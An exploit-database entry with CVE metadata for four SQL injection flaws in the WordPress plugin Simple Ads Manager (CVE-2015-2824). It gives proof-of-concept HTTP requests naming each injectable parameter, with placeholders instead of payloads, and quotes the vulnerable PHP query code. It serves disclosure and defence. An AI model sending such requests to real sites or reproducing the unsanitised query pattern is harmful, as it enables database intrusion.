ID 1337DAY-ID-23466
Type zdt
Reporter ITAS Team
Modified 2015-04-02T00:00:00
Description
Exploit for php platform in category web applications
#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh ([email protected]) & ITAS Team
::PROOF OF CONCEPT::
---SQL INJECTION 1---
+ REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3
- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:
case 'sam_ajax_sam_hits':
if(isset($_POST['hits']) && is_array($_POST['hits'])) {
$hits = $_POST['hits'];
$values = '';
$remoteAddr = $_SERVER['REMOTE_ADDR'];
foreach($hits as $hit) {
$values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
}
$sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};";
$result = $wpdb->query($sql);
if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
else echo json_encode(array(
'success' => false,
'result' => $result,
'sql' => $sql,
'hits' => $hits,
'values' => $values
));
}
break;
---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
$custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
$sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';
$sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';
//set @row_num = 0;
//SELECT @row_num := @row_num + 1 AS recid
$sql = "SELECT
wp.id,
wp.post_title AS title,
wp.post_type AS type
FROM
$postTable wp
WHERE
wp.post_status = 'publish' AND
FIND_IN_SET(wp.post_type, 'post,page{$custs}')
ORDER BY wp.id;";
$posts = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($posts as &$val) {
switch($val['type']) {
case 'post':
$val['type'] = $sPost;
break;
case 'page':
$val['type'] = $sPage;
break;
default:
$val['type'] = $sPost . ': '.$val['type'];
break;
}
$k++;
$val['recid'] = $k;
}
$out = array(
'status' => 'success',
'total' => count($posts),
'records' => $posts
);
break;
---SQL INJECTION 3---
+REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
action=load_combo_data
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+Vulnerable code: from line 225 to 255
case 'sam_ajax_load_combo_data':
$page = $_GET['page'];
$rows = $_GET['rows'];
$searchTerm = $_GET['searchTerm'];
$offset = ((int)$page - 1) * (int)$rows;
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
wu.user_email AS email
FROM
$uTable wu
WHERE wu.user_nicename LIKE '{$searchTerm}%'
ORDER BY wu.id
LIMIT $offset, $rows;";
$users = $wpdb->get_results($sql, ARRAY_A);
$sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';";
$rTotal = $wpdb->get_var($sql);
$total = ceil((int)$rTotal/(int)$rows);
$out = array(
'page' => $page,
'records' => count($users),
'rows' => $users,
'total' => $total,
'offset' => $offset
);
break;
---SQL INJECTION 4---
+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE>
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code: from line 188 to 223
case 'sam_ajax_load_users':
$roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber';
$roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor';
$roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author';
$roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor';
$roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator';
$roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin';
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
(CASE wum.meta_value
WHEN 0 THEN '$roleSubscriber'
WHEN 1 THEN '$roleContributor'
WHEN 2 THEN '$roleAuthor'
ELSE
IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor',
IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator',
IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
)
)
END) AS role
FROM $uTable wu
INNER JOIN $umTable wum
ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
ORDER BY wu.id;";
$users = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($users as &$val) {
$k++;
$val['recid'] = $k;
}
$out = $users;
break;
# 0day.today [2018-01-26] #
{"published": "2015-04-02T00:00:00", "id": "1337DAY-ID-23466", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2018-01-26T23:23:13", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2824"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131280"]}, {"type": "dsquare", "idList": ["E-449"]}, {"type": "exploitdb", "idList": ["EDB-ID:36613"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32055", "SECURITYVULNS:VULN:14473", "SECURITYVULNS:DOC:32054"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F280005D75D4F24ECE63387866E4C483"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805520"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:89F75C74-4126-467B-AADD-04B1C1BBC941", "WPVDB-ID:7882"]}], "modified": "2018-01-26T23:23:13", "rev": 2}, "vulnersScore": 7.1}, "type": "zdt", "lastseen": "2018-01-26T23:23:13", "edition": 2, "title": "Wordpress Simple Ads Manager Plugin - Multiple SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/23466", "modified": "2015-04-02T00:00:00", "bulletinFamily": "exploit", "viewCount": 13, "cvelist": ["CVE-2015-2824"], "sourceHref": "https://0day.today/exploit/23466", "references": [], "reporter": "ITAS Team", "sourceData": "#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection\r\n#Product: Wordpress plugin Simple Ads Manager\r\n#Vendor: https://profiles.wordpress.org/minimus/\r\n#Affected version: Simple Ads Manager 2.5.94 and 2.5.96\r\n#Download link: https://wordpress.org/plugins/simple-ads-manager/\r\n#CVE ID: CVE-2015-2824\r\n#Author: Le Hong Minh ([email\u00a0protected]) & ITAS Team\r\n \r\n \r\n::PROOF OF CONCEPT::\r\n \r\n---SQL INJECTION 1---\r\n \r\n+ REQUEST:\r\n \r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1\r\nHost: target.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: http://target.com/archives/wordpress-plugin-simple-ads-manager/\r\nContent-Length: 270\r\nCookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n \r\naction=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3\r\n \r\n \r\n- Vulnerable file: simple-ads-manager/sam-ajax.php\r\n- Vulnerable code:\r\n \r\n case 'sam_ajax_sam_hits':\r\n if(isset($_POST['hits']) && is_array($_POST['hits'])) {\r\n $hits = $_POST['hits'];\r\n $values = '';\r\n $remoteAddr = $_SERVER['REMOTE_ADDR'];\r\n foreach($hits as $hit) {\r\n $values .= ((empty($values)) ? '' : ', ') . \"({$hit[1]}, {$hit[0]}, NOW(), 0, \\\"{$remoteAddr}\\\")\";\r\n }\r\n $sql = \"INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};\";\r\n $result = $wpdb->query($sql);\r\n if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));\r\n else echo json_encode(array(\r\n 'success' => false,\r\n 'result' => $result,\r\n 'sql' => $sql,\r\n 'hits' => $hits,\r\n 'values' => $values\r\n )); \r\n }\r\n break;\r\n \r\n \r\n \r\n \r\n---SQL INJECTION 2---\r\n+REQUEST\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\r\nHost: hostname\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\n \r\naction=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page\r\n \r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n+ Vulnerable code:\r\ncase 'sam_ajax_load_posts':\r\n $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';\r\n $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';\r\n $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';\r\n \r\n //set @row_num = 0;\r\n //SELECT @row_num := @row_num + 1 AS recid\r\n $sql = \"SELECT\r\n wp.id,\r\n wp.post_title AS title,\r\n wp.post_type AS type\r\n FROM\r\n $postTable wp\r\n WHERE\r\n wp.post_status = 'publish' AND\r\n FIND_IN_SET(wp.post_type, 'post,page{$custs}')\r\n ORDER BY wp.id;\";\r\n \r\n $posts = $wpdb->get_results($sql, ARRAY_A);\r\n \r\n $k = 0;\r\n foreach($posts as &$val) {\r\n switch($val['type']) {\r\n case 'post':\r\n $val['type'] = $sPost;\r\n break;\r\n case 'page':\r\n $val['type'] = $sPage;\r\n break;\r\n default:\r\n $val['type'] = $sPost . ': '.$val['type'];\r\n break;\r\n }\r\n $k++;\r\n $val['recid'] = $k;\r\n }\r\n $out = array(\r\n 'status' => 'success',\r\n 'total' => count($posts),\r\n 'records' => $posts\r\n );\r\n break;\r\n \r\n \r\n \r\n---SQL INJECTION 3---\r\n+REQUEST:\r\n \r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\n \r\naction=load_combo_data\r\n \r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n+Vulnerable code: from line 225 to 255\r\n case 'sam_ajax_load_combo_data':\r\n $page = $_GET['page'];\r\n $rows = $_GET['rows'];\r\n $searchTerm = $_GET['searchTerm'];\r\n $offset = ((int)$page - 1) * (int)$rows;\r\n $sql = \"SELECT\r\n wu.id,\r\n wu.display_name AS title,\r\n wu.user_nicename AS slug,\r\n wu.user_email AS email\r\n FROM\r\n $uTable wu\r\n WHERE wu.user_nicename LIKE '{$searchTerm}%'\r\n ORDER BY wu.id\r\n LIMIT $offset, $rows;\";\r\n $users = $wpdb->get_results($sql, ARRAY_A);\r\n $sql = \"SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';\";\r\n $rTotal = $wpdb->get_var($sql);\r\n $total = ceil((int)$rTotal/(int)$rows);\r\n $out = array(\r\n 'page' => $page,\r\n 'records' => count($users),\r\n 'rows' => $users,\r\n 'total' => $total,\r\n 'offset' => $offset\r\n );\r\n break;\r\n \r\n \r\n \r\n \r\n---SQL INJECTION 4---\r\n \r\n+ REQUEST\r\n \r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 73\r\n \r\naction=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE>\r\n \r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n \r\n+ Vulnerable code: from line 188 to 223\r\n case 'sam_ajax_load_users':\r\n $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber';\r\n $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor';\r\n $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author';\r\n $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor';\r\n $roleAdministrator = (isset($_REQUEST[\"admin\"])) ? urldecode($_REQUEST[\"admin\"]) : 'Administrator';\r\n $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin';\r\n $sql = \"SELECT\r\n wu.id,\r\n wu.display_name AS title,\r\n wu.user_nicename AS slug,\r\n (CASE wum.meta_value\r\n WHEN 0 THEN '$roleSubscriber'\r\n WHEN 1 THEN '$roleContributor'\r\n WHEN 2 THEN '$roleAuthor'\r\n ELSE\r\n IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor',\r\n IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator',\r\n IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)\r\n )\r\n )\r\n END) AS role\r\n FROM $uTable wu\r\n INNER JOIN $umTable wum\r\n ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'\r\n ORDER BY wu.id;\";\r\n $users = $wpdb->get_results($sql, ARRAY_A);\r\n $k = 0;\r\n foreach($users as &$val) {\r\n $k++;\r\n $val['recid'] = $k;\r\n }\r\n $out = $users;\r\n break;\n\n# 0day.today [2018-01-26] #", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:21:23", "description": "Multiple SQL injection vulnerabilities in the Simple Ads Manager plugin before 2.7.97 for WordPress allow remote attackers to execute arbitrary SQL commands via a (1) hits[][] parameter in a sam_hits action to sam-ajax.php; the (2) cstr parameter in a load_posts action to sam-ajax-admin.php; the (3) searchTerm parameter in a load_combo_data action to sam-ajax-admin.php; or the (4) subscriber, (5) contributor, (6) author, (7) editor, (8) admin, or (9) sadmin parameter in a load_users action to sam-ajax-admin.php.", "edition": 4, "cvss3": {}, "published": "2015-04-06T15:59:00", "title": "CVE-2015-2824", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2824"], "modified": "2018-10-09T19:56:00", "cpe": ["cpe:/a:simple_ads_manager_project:simple_ads_manager:2.5.94", "cpe:/a:simple_ads_manager_project:simple_ads_manager:2.5.96"], "id": "CVE-2015-2824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2824", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:simple_ads_manager_project:simple_ads_manager:2.5.94:*:*:*:*:wordpress:*:*", "cpe:2.3:a:simple_ads_manager_project:simple_ads_manager:2.5.96:*:*:*:*:wordpress:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-2824"], "description": "\r\n\r\n#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection\r\n#Product: Wordpress plugin Simple Ads Manager\r\n#Vendor: https://profiles.wordpress.org/minimus/\r\n#Affected version: Simple Ads Manager 2.5.94 and 2.5.96\r\n#Download link: https://wordpress.org/plugins/simple-ads-manager/\r\n#CVE ID: CVE-2015-2824\r\n#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team\r\n\r\n\r\n::PROOF OF CONCEPT::\r\n\r\n---SQL INJECTION 1---\r\n\r\n+ REQUEST:\r\n\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1\r\nHost: target.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101\r\nFirefox/28.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: http://target.com/archives/wordpress-plugin-simple-ads-manager/\r\nContent-Length: 270\r\nCookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;\r\nPHPSESSID=kqvtir87g33e2ujkc290l5bmm7;\r\ncre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\naction=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION\r\nHERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL\r\nINJECTION HERE>&level=3\r\n\r\n\r\n- Vulnerable file: simple-ads-manager/sam-ajax.php\r\n- Vulnerable code:\r\n\r\n\t case 'sam_ajax_sam_hits':\r\n\t\t if(isset($_POST['hits']) && is_array($_POST['hits'])) {\r\n\t\t\t $hits = $_POST['hits'];\r\n\t\t\t $values = '';\r\n\t\t\t $remoteAddr = $_SERVER['REMOTE_ADDR'];\r\n\t\t\t foreach($hits as $hit) {\r\n\t\t\t\t $values .= ((empty($values)) ? '' : ', ')\r\n. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";\r\n\t\t\t }\r\n\t\t\t $sql = "INSERT INTO $sTable (id, pid, event_time,\r\nevent_type, remote_addr) VALUES {$values};";\r\n\t\t\t $result = $wpdb->query($sql);\r\n\t\t\t if($result > 0) echo json_encode(array('success'\r\n=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));\r\n\t\t\t else echo json_encode(array(\r\n\t\t\t\t 'success' => false,\r\n\t\t\t\t 'result' => $result,\r\n\t\t\t\t 'sql' => $sql,\r\n\t\t\t\t 'hits' => $hits,\r\n\t\t\t\t 'values' => $values\r\n\t\t\t ));\t\r\n\t\t }\r\n\t\t break;\r\n\r\n\r\n\t\t \r\n\t\t \r\n---SQL INJECTION 2---\r\n+REQUEST\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\r\nHost: hostname\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\n\r\naction=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page\r\n\r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n+ Vulnerable code:\r\ncase 'sam_ajax_load_posts':\r\n $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';\r\n $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :\r\n'Post';\r\n $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :\r\n'Page';\r\n\r\n //set @row_num = 0;\r\n //SELECT @row_num := @row_num + 1 AS recid\r\n $sql = "SELECT\r\n wp.id,\r\n wp.post_title AS title,\r\n wp.post_type AS type\r\n FROM\r\n $postTable wp\r\n WHERE\r\n wp.post_status = 'publish' AND\r\n FIND_IN_SET(wp.post_type, 'post,page{$custs}')\r\n ORDER BY wp.id;";\r\n\r\n $posts = $wpdb->get_results($sql, ARRAY_A);\r\n\r\n $k = 0;\r\n foreach($posts as &$val) {\r\n switch($val['type']) {\r\n case 'post':\r\n $val['type'] = $sPost;\r\n break;\r\n case 'page':\r\n $val['type'] = $sPage;\r\n break;\r\n default:\r\n $val['type'] = $sPost . ': '.$val['type'];\r\n break;\r\n }\r\n $k++;\r\n $val['recid'] = $k;\r\n }\r\n $out = array(\r\n 'status' => 'success',\r\n 'total' => count($posts),\r\n 'records' => $posts\r\n );\r\n break;\r\n\r\n\t \r\n\t \r\n---SQL INJECTION 3---\r\n+REQUEST:\r\n\r\nPOST\r\n/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL\r\nINJECTION HERE> HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101\r\nFirefox/36.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;\r\n__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n;\r\nwp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%\r\n3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3\r\nDshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;\r\nwp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;\r\nwordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;\r\n__utmb=30068390.1.10.1427794022; __utmc=30068390\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\n\r\naction=load_combo_data\r\n\r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n+Vulnerable code: from line 225 to 255\r\n case 'sam_ajax_load_combo_data':\r\n $page = $_GET['page'];\r\n $rows = $_GET['rows'];\r\n $searchTerm = $_GET['searchTerm'];\r\n $offset = ((int)$page - 1) * (int)$rows;\r\n $sql = "SELECT\r\n wu.id,\r\n wu.display_name AS title,\r\n wu.user_nicename AS slug,\r\n wu.user_email AS email\r\n FROM\r\n $uTable wu\r\n WHERE wu.user_nicename LIKE '{$searchTerm}%'\r\n ORDER BY wu.id\r\n LIMIT $offset, $rows;";\r\n $users = $wpdb->get_results($sql, ARRAY_A);\r\n $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE\r\n'{$searchTerm}%';";\r\n $rTotal = $wpdb->get_var($sql);\r\n $total = ceil((int)$rTotal/(int)$rows);\r\n $out = array(\r\n 'page' => $page,\r\n 'records' => count($users),\r\n 'rows' => $users,\r\n 'total' => $total,\r\n 'offset' => $offset\r\n );\r\n break;\r\n\r\n\t \r\n\t \r\n\t \r\n---SQL INJECTION 4---\r\n\r\n+ REQUEST\r\n\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101\r\nFirefox/36.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: 